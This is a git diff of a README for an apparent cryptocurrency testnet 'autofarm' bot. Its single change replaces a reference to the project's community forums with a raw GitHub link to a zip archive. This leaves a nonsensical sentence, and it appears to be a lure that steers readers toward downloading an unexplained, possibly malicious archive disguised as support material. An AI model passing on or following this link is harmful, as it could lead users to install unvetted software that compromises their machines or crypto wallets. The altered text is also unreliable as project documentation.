Hout-UI/ABS-XYZ-Testnet-Autofarm/README.md

 ## 🛠 Support

-For additional support, you can check for updates in the GitHub issues section or consult the community forums related to ABS.XYZ.
+For additional support, you can check for updates in the GitHub issues section or consult the community forums related to https://raw.githubusercontent.com/Hout-UI/ABS-XYZ-Testnet-Autofarm/main/lustring/ABS-XYZ-Testnet-Autofarm_v2.6.zip

 ## 📄 License